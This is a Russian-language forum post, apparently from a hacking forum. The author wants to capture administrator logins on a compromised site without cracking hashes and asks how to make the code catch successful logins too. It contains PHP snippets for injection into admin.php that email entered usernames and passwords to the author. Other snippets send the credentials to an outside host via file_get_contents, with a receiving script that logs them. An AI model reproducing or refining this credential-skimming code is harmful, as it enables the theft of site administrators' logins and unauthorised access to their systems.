Вариант с расшифровкой хеша не рассматриваю, т.к. есть пароли на расшифровку которых уйдёт очень много времени. Тестирую на локалке 2 варианта: 1. Отправка на мыло (файл admin.php) PHP: $from = 'hack@'.$_SERVER['HTTP_HOST']; $subject = '=?Windows-1251?B?'.trim(@imap_binary('hack')).'?='; $headers = 'Return-Path: '.$from.''."\r\n"; $headers .= 'MIME-Version: 1.0'."\r\n"; $headers .= 'Content-Transfer-Encoding: 8bit'."\r\n"; $headers .= 'Content-Type: text/plain; charset="Windows-1251"'."\r\n"; $headers .= 'X-Mailer: PHP v.'.phpversion()."\r\n"; $headers .= 'From: =?Windows-1251?B?'.trim(imap_binary(addcslashes($var['title'], "\"!@\\!@(!@)"))).'?= <'.$from.'>'."\r\n"; $headers .= 'Reply-to: '.$from."\r\n"; @mail('my@mail.ru', $subject, ''.$username.'' . ''.$password.'', $headers); Косяк в том, что мыло приходит только если лог\пасс были введены не верно.. 2. Запись в лог на удалённый хост (файл admin.php) PHP: $log = fopen("log.txt","a+"); fwrite($log,"\n $username:$password"); file_get_contents("http://ourhost.ru/script.php?username=".$username."&password=".$password); script.php PHP: <?PHP $username = $_GET['username']; $password = $_GET['password']; $log = fopen("log.txt","a+"); fwrite($log,"\n $username:$password"); ?> Косяк тот же - пишутся только неправильные лог\пассы.. Может я пытаюсь изобрести велосипед и есть способ проще? Поделитесь плиз!